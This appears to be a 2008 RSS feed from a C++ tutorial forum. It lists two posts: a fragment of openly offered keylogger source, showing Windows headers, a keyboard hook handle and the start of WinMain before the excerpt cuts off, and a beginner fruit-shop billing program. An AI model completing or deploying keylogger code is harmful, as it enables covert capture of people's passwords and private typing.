<?xml version="1.0" encoding="iso-8859-1"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title>Borland C and C++ Tutorial</title>
		<link>http://whiz.forummotion.com/borland-c-and-c-tutorial-f23/-t1.htm</link>
		<description> C++ Program Tutorials</description>
		<lastBuildDate>Wed, 16 Apr 2008 16:36:35 GMT</lastBuildDate>
		<ttl>10</ttl>
		<image>
			<title>Borland C and C++ Tutorial</title>
			<url>http://i299.photobucket.com/albums/mm309/czechoo/banner1-2.jpg</url>
			<link>http://whiz.forummotion.com/borland-c-and-c-tutorial-f23/-t1.htm</link>
		</image>
		<item>
			<title>[ C++ ] KeyLogger</title>
			<link>http://whiz.forummotion.com/borland-c-and-c-tutorial-f23/c-keylogger-t46.htm</link>
			<dc:creator>[Whiz]~Sakeral</dc:creator>
			<description>Code:

#include "windows.h"

#include "fstream.h"

#include "iostream.h"

/* Declare Windows procedure */

LRESULT CALLBACK WindowProcedure &#40;HWND, UINT, WPARAM, LPARAM&#41;;

/* Make the class name into a global variable */

char szClassName&#91; &#93; = "KeyLord";

HHOOK kbhook;

fstream file;

int prev;

int WINAPI WinMain &#40;HINSTANCE hThisInstance,

HINSTANCE hPrevInstance,

LPSTR lpszArgument,

int nFunsterStil&#41;

&#123;

HWND hwnd; /* This is the handle for our window */

MSG messages;  ...</description>
			<category>Borland C and C++ Tutorial</category>
			<pubDate>Wed, 16 Apr 2008 16:36:35 GMT</pubDate>
			<comments>http://whiz.forummotion.com/borland-c-and-c-tutorial-f23/c-keylogger-t46.htm#83</comments>
			<guid>http://whiz.forummotion.com/borland-c-and-c-tutorial-f23/c-keylogger-t46.htm</guid>
		</item>
		<item>
			<title>Selecting Fruits Code</title>
			<link>http://whiz.forummotion.com/borland-c-and-c-tutorial-f23/selecting-fruits-code-t14.htm</link>
			<dc:creator>[Whiz]~Czechoslovakia</dc:creator>
			<description>#include 

main()

{

    

    int quantity, vat, price, amount, change, total;

    char code,fruit;

    char name[10], date[20];

    cout&lt;&lt;&quot;Please Enter Date: &quot;;

    cin&gt;&gt;date;

    cout&lt;&lt;&quot;Please Enter Customer Name: &quot;;

    cin&gt;&gt;name;

    cout&lt;&lt;&quot;Please Enter Code: &quot;;

    cin&gt;&gt;code;

    switch (code)

    {

    case 'L':

    case 'l':

            cout&lt;&lt;&quot;\tLOCAL FRUITS&quot; &lt;

            cout&lt;&lt;&quot;A.  ...</description>
			<category>Borland C and C++ Tutorial</category>
			<pubDate>Tue, 15 Apr 2008 15:20:36 GMT</pubDate>
			<comments>http://whiz.forummotion.com/borland-c-and-c-tutorial-f23/selecting-fruits-code-t14.htm#20</comments>
			<guid>http://whiz.forummotion.com/borland-c-and-c-tutorial-f23/selecting-fruits-code-t14.htm</guid>
		</item>
	</channel>
</rss>